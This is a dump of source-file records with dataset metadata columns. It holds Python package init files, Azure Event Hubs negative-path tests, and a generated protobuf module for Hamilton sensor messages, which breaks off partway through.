| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ac436aa40eb6b64f960b62f517af827e75d2cad
| 273
|
py
|
Python
|
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
from .data_loader_x import build_x_test_loader, build_x_train_loader
from .datasets.atr import register_atr_instance
from .datasets.cihp import register_cihp_instance
from .datasets.mhp_v1 import register_mhpv1_instance
from .datasets.mhp_v2 import register_mhpv2_instance
| 45.5
| 68
| 0.886447
| 43
| 273
| 5.209302
| 0.418605
| 0.214286
| 0.267857
| 0.205357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.076923
| 273
| 5
| 69
| 54.6
| 0.873016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1acb8a3c6af778357e8a0e5ab2d83b1944cc27fe
| 7,954
|
py
|
Python
|
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import asyncio
import pytest
from azure import eventhub
from azure.eventhub import EventData, Offset, EventHubError, EventHubClient
from azure.eventhub.async import EventHubClientAsync
def test_send_partition_key_with_partition(connection_str):
client = EventHubClient.from_connection_string(connection_str, debug=False)
sender = client.add_sender(partition="1")
try:
client.run()
data = EventData(b"Data")
data.partition_key = b"PKey"
with pytest.raises(ValueError):
sender.send(data)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_send_partition_key_with_partition_async(connection_str):
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
sender = client.add_async_sender(partition="1")
try:
await client.run_async()
data = EventData(b"Data")
data.partition_key = b"PKey"
with pytest.raises(ValueError):
await sender.send(data)
except:
raise
finally:
await client.stop_async()
def test_non_existing_entity_sender(connection_str):
client = EventHubClient.from_connection_string(connection_str, eventhub="nemo", debug=False)
sender = client.add_sender(partition="1")
try:
client.run()
data = EventData(b"Data")
with pytest.raises(EventHubError):
sender.send(data)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_non_existing_entity_sender_async(connection_str):
client = EventHubClientAsync.from_connection_string(connection_str, eventhub="nemo", debug=False)
sender = client.add_async_sender(partition="1")
try:
await client.run_async()
data = EventData(b"Data")
with pytest.raises(EventHubError):
await sender.send(data)
except:
raise
finally:
await client.stop_async()
def test_non_existing_entity_receiver(connection_str):
client = EventHubClient.from_connection_string(connection_str, eventhub="nemo", debug=False)
receiver = client.add_receiver("$default", "0")
try:
client.run()
with pytest.raises(EventHubError):
receiver.receive(timeout=5)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_non_existing_entity_receiver_async(connection_str):
client = EventHubClientAsync.from_connection_string(connection_str, eventhub="nemo", debug=False)
receiver = client.add_async_receiver("$default", "0")
try:
await client.run_async()
with pytest.raises(EventHubError):
await receiver.receive(timeout=5)
except:
raise
finally:
await client.stop_async()
def test_receive_from_invalid_partitions(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
for p in partitions:
client = EventHubClient.from_connection_string(connection_str, debug=False)
receiver = client.add_receiver("$default", p)
try:
client.run()
with pytest.raises(EventHubError):
receiver.receive(timeout=5)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_receive_from_invalid_partitions_async(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
for p in partitions:
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
receiver = client.add_async_receiver("$default", p)
try:
await client.run_async()
with pytest.raises(EventHubError):
await receiver.receive(timeout=5)
except:
raise
finally:
await client.stop_async()
def test_send_to_invalid_partitions(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
for p in partitions:
client = EventHubClient.from_connection_string(connection_str, debug=False)
sender = client.add_sender(partition=p)
try:
client.run()
data = EventData(b"Data")
with pytest.raises(EventHubError):
sender.send(data)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_send_to_invalid_partitions_async(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
for p in partitions:
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
sender = client.add_async_sender(partition=p)
try:
await client.run_async()
data = EventData(b"Data")
with pytest.raises(EventHubError):
await sender.send(data)
except:
raise
finally:
await client.stop_async()
def test_send_too_large_message(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
client = EventHubClient.from_connection_string(connection_str, debug=False)
sender = client.add_sender()
try:
client.run()
data = EventData(b"A" * 300000)
with pytest.raises(EventHubError):
sender.send(data)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_send_too_large_message_async(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
sender = client.add_async_sender()
try:
await client.run_async()
data = EventData(b"A" * 300000)
with pytest.raises(EventHubError):
await sender.send(data)
except:
raise
finally:
await client.stop_async()
def test_send_null_body(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
client = EventHubClient.from_connection_string(connection_str, debug=False)
sender = client.add_sender()
try:
client.run()
with pytest.raises(ValueError):
data = EventData(None)
sender.send(data)
except:
raise
finally:
client.stop()
@pytest.mark.asyncio
async def test_send_null_body_async(connection_str):
partitions = ["XYZ", "-1", "1000", "-" ]
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
sender = client.add_async_sender()
try:
await client.run_async()
with pytest.raises(ValueError):
data = EventData(None)
await sender.send(data)
except:
raise
finally:
await client.stop_async()
async def pump(receiver):
messages = 0
batch = await receiver.receive(timeout=10)
while batch:
messages += len(batch)
batch = await receiver.receive(timeout=10)
return messages
@pytest.mark.asyncio
async def test_max_receivers_async(connection_str, senders):
client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
receivers = []
for i in range(6):
receivers.append(client.add_async_receiver("$default", "0", prefetch=1000, offset=Offset('@latest')))
await client.run_async()
try:
outputs = await asyncio.gather(
pump(receivers[0]),
pump(receivers[1]),
pump(receivers[2]),
pump(receivers[3]),
pump(receivers[4]),
pump(receivers[5]),
return_exceptions=True)
assert len([o for o in outputs if isinstance(o, EventHubError)]) == 1
except:
raise
finally:
await client.stop_async()
| 30.710425
| 109
| 0.634775
| 871
| 7,954
| 5.603904
| 0.12744
| 0.079902
| 0.061463
| 0.092194
| 0.863348
| 0.863348
| 0.833436
| 0.775456
| 0.763983
| 0.738783
| 0
| 0.013344
| 0.246291
| 7,954
| 259
| 110
| 30.710425
| 0.800834
| 0.037465
| 0
| 0.799087
| 0
| 0
| 0.024046
| 0
| 0
| 0
| 0
| 0
| 0.004566
| 0
| null | null | 0
| 0.027397
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2001532766c40fd23a544d9b328fb0656a3461df
| 196
|
py
|
Python
|
server/problem_sets/__init__.py
|
iiridescent/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | null | null | null |
server/problem_sets/__init__.py
|
iiridescent/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | 5
|
2021-03-09T10:36:59.000Z
|
2022-02-26T14:36:08.000Z
|
server/problem_sets/__init__.py
|
vinhowe/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2019 Thomas Howe
from .api import *
from .environment import *
from .gen import *
from .gen.testbed import *
from .gen.util import *
from .problem import *
from .widget import *
| 19.6
| 33
| 0.719388
| 28
| 196
| 5.035714
| 0.5
| 0.425532
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.183673
| 196
| 9
| 34
| 21.777778
| 0.85625
| 0.153061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
201899b0fccfc074a45bf3cad105de05d14e80d7
| 26,627
|
py
|
Python
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 9
|
2019-02-08T01:35:14.000Z
|
2021-11-11T14:56:00.000Z
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 26
|
2019-02-25T16:57:02.000Z
|
2019-08-05T20:44:52.000Z
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 5
|
2019-02-05T20:04:40.000Z
|
2021-09-14T05:54:03.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: hamilton.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='hamilton.proto',
package='xbospb',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0ehamilton.proto\x12\x06xbospb\"\\\n\x0cHamiltonData\x12\x0e\n\x06serial\x18\x01 \x01(\r\x12\r\n\x05model\x18\x02 \x01(\t\x12\x0c\n\x04time\x18\x03 \x01(\x04\x12\x1f\n\x03h3c\x18\x04 \x01(\x0b\x32\x12.xbospb.Hamilton3C\"\x95\x02\n\nHamilton3C\x12\x0e\n\x06uptime\x18\x01 \x01(\x04\x12\r\n\x05\x66lags\x18\x02 \x01(\r\x12\r\n\x05\x61\x63\x63_x\x18\x03 \x01(\x01\x12\r\n\x05\x61\x63\x63_y\x18\x04 \x01(\x01\x12\r\n\x05\x61\x63\x63_z\x18\x05 \x01(\x01\x12\r\n\x05mag_x\x18\x06 \x01(\x01\x12\r\n\x05mag_y\x18\x07 \x01(\x01\x12\r\n\x05mag_z\x18\x08 \x01(\x01\x12\x0f\n\x07tmp_die\x18\t \x01(\x01\x12\x13\n\x0btmp_voltage\x18\n \x01(\x01\x12\x10\n\x08\x61ir_temp\x18\x0b \x01(\x01\x12\x0f\n\x07\x61ir_hum\x18\x0c \x01(\x01\x12\x0e\n\x06\x61ir_rh\x18\r \x01(\x01\x12\x11\n\tlight_lux\x18\x0e \x01(\x01\x12\x0f\n\x07\x62uttons\x18\x0f \x01(\r\x12\x11\n\toccupancy\x18\x10 \x01(\x01\"\x96\x02\n\x0bHamilton330\x12\x0e\n\x06uptime\x18\x01 \x01(\x04\x12\r\n\x05\x66lags\x18\x02 \x01(\r\x12\r\n\x05\x61\x63\x63_x\x18\x03 \x01(\x01\x12\r\n\x05\x61\x63\x63_y\x18\x04 \x01(\x01\x12\r\n\x05\x61\x63\x63_z\x18\x05 \x01(\x01\x12\r\n\x05mag_x\x18\x06 \x01(\x01\x12\r\n\x05mag_y\x18\x07 \x01(\x01\x12\r\n\x05mag_z\x18\x08 \x01(\x01\x12\x0f\n\x07tmp_die\x18\t \x01(\x01\x12\x13\n\x0btmp_voltage\x18\n \x01(\x01\x12\x10\n\x08\x61ir_temp\x18\x0b \x01(\x01\x12\x0f\n\x07\x61ir_hum\x18\x0c \x01(\x01\x12\x0e\n\x06\x61ir_rh\x18\r \x01(\x01\x12\x11\n\tlight_lux\x18\x0e \x01(\x01\x12\x0f\n\x07\x62uttons\x18\x0f \x01(\r\x12\x11\n\toccupancy\x18\x10 \x01(\x01\"\x8c\x02\n\x13HamiltonBRLinkStats\x12\x11\n\tBadFrames\x18\x01 \x01(\x04\x12\x12\n\nLostFrames\x18\x02 \x01(\x04\x12\x18\n\x10\x44ropNotConnected\x18\x03 \x01(\x04\x12\x19\n\x11SumSerialReceived\x18\x04 \x01(\x04\x12\x1a\n\x12SumDomainForwarded\x18\x05 \x01(\x04\x12\x1b\n\x13SumDropNotConnected\x18\x06 \x01(\x04\x12\x19\n\x11SumDomainReceived\x18\x07 \x01(\x04\x12\x1a\n\x12SumSerialForwarded\x18\x08 \x01(\x04\x12\x13\n\x0bPublishOkay\x18\t \x01(\x04\x12\x14\n\x0cPublishError\x18\n \x01(\x04\"\x8e\x01\n\x11HamiltonBRMessage\x12\x0e\n\x06SrcMAC\x18\x01 \x01(\t\x12\r\n\x05SrcIP\x18\x02 \x01(\t\x12\r\n\x05PopID\x18\x03 \x01(\t\x12\x0f\n\x07PopTime\x18\x04 \x01(\x03\x12\x0e\n\x06\x42RTime\x18\x05 \x01(\x03\x12\x0c\n\x04RSSI\x18\x06 \x01(\x05\x12\x0b\n\x03LQI\x18\x07 \x01(\x05\x12\x0f\n\x07Payload\x18\x08 \x01(\x0c\x62\x06proto3')
)
_HAMILTONDATA = _descriptor.Descriptor(
name='HamiltonData',
full_name='xbospb.HamiltonData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='serial', full_name='xbospb.HamiltonData.serial', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='model', full_name='xbospb.HamiltonData.model', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time', full_name='xbospb.HamiltonData.time', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='h3c', full_name='xbospb.HamiltonData.h3c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=118,
)
_HAMILTON3C = _descriptor.Descriptor(
name='Hamilton3C',
full_name='xbospb.Hamilton3C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uptime', full_name='xbospb.Hamilton3C.uptime', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='xbospb.Hamilton3C.flags', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_x', full_name='xbospb.Hamilton3C.acc_x', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_y', full_name='xbospb.Hamilton3C.acc_y', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_z', full_name='xbospb.Hamilton3C.acc_z', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_x', full_name='xbospb.Hamilton3C.mag_x', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_y', full_name='xbospb.Hamilton3C.mag_y', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_z', full_name='xbospb.Hamilton3C.mag_z', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_die', full_name='xbospb.Hamilton3C.tmp_die', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_voltage', full_name='xbospb.Hamilton3C.tmp_voltage', index=9,
number=10, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_temp', full_name='xbospb.Hamilton3C.air_temp', index=10,
number=11, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_hum', full_name='xbospb.Hamilton3C.air_hum', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_rh', full_name='xbospb.Hamilton3C.air_rh', index=12,
number=13, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='light_lux', full_name='xbospb.Hamilton3C.light_lux', index=13,
number=14, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='buttons', full_name='xbospb.Hamilton3C.buttons', index=14,
number=15, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='occupancy', full_name='xbospb.Hamilton3C.occupancy', index=15,
number=16, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=398,
)
_HAMILTON330 = _descriptor.Descriptor(
name='Hamilton330',
full_name='xbospb.Hamilton330',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uptime', full_name='xbospb.Hamilton330.uptime', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='xbospb.Hamilton330.flags', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_x', full_name='xbospb.Hamilton330.acc_x', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_y', full_name='xbospb.Hamilton330.acc_y', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_z', full_name='xbospb.Hamilton330.acc_z', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_x', full_name='xbospb.Hamilton330.mag_x', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_y', full_name='xbospb.Hamilton330.mag_y', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_z', full_name='xbospb.Hamilton330.mag_z', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_die', full_name='xbospb.Hamilton330.tmp_die', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_voltage', full_name='xbospb.Hamilton330.tmp_voltage', index=9,
number=10, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_temp', full_name='xbospb.Hamilton330.air_temp', index=10,
number=11, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_hum', full_name='xbospb.Hamilton330.air_hum', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_rh', full_name='xbospb.Hamilton330.air_rh', index=12,
number=13, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='light_lux', full_name='xbospb.Hamilton330.light_lux', index=13,
number=14, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='buttons', full_name='xbospb.Hamilton330.buttons', index=14,
number=15, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='occupancy', full_name='xbospb.Hamilton330.occupancy', index=15,
number=16, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=401,
serialized_end=679,
)
_HAMILTONBRLINKSTATS = _descriptor.Descriptor(
name='HamiltonBRLinkStats',
full_name='xbospb.HamiltonBRLinkStats',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='BadFrames', full_name='xbospb.HamiltonBRLinkStats.BadFrames', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='LostFrames', full_name='xbospb.HamiltonBRLinkStats.LostFrames', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DropNotConnected', full_name='xbospb.HamiltonBRLinkStats.DropNotConnected', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumSerialReceived', full_name='xbospb.HamiltonBRLinkStats.SumSerialReceived', index=3,
number=4, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDomainForwarded', full_name='xbospb.HamiltonBRLinkStats.SumDomainForwarded', index=4,
number=5, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDropNotConnected', full_name='xbospb.HamiltonBRLinkStats.SumDropNotConnected', index=5,
number=6, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDomainReceived', full_name='xbospb.HamiltonBRLinkStats.SumDomainReceived', index=6,
number=7, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumSerialForwarded', full_name='xbospb.HamiltonBRLinkStats.SumSerialForwarded', index=7,
number=8, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PublishOkay', full_name='xbospb.HamiltonBRLinkStats.PublishOkay', index=8,
number=9, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PublishError', full_name='xbospb.HamiltonBRLinkStats.PublishError', index=9,
number=10, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=682,
serialized_end=950,
)
_HAMILTONBRMESSAGE = _descriptor.Descriptor(
name='HamiltonBRMessage',
full_name='xbospb.HamiltonBRMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='SrcMAC', full_name='xbospb.HamiltonBRMessage.SrcMAC', index=0,
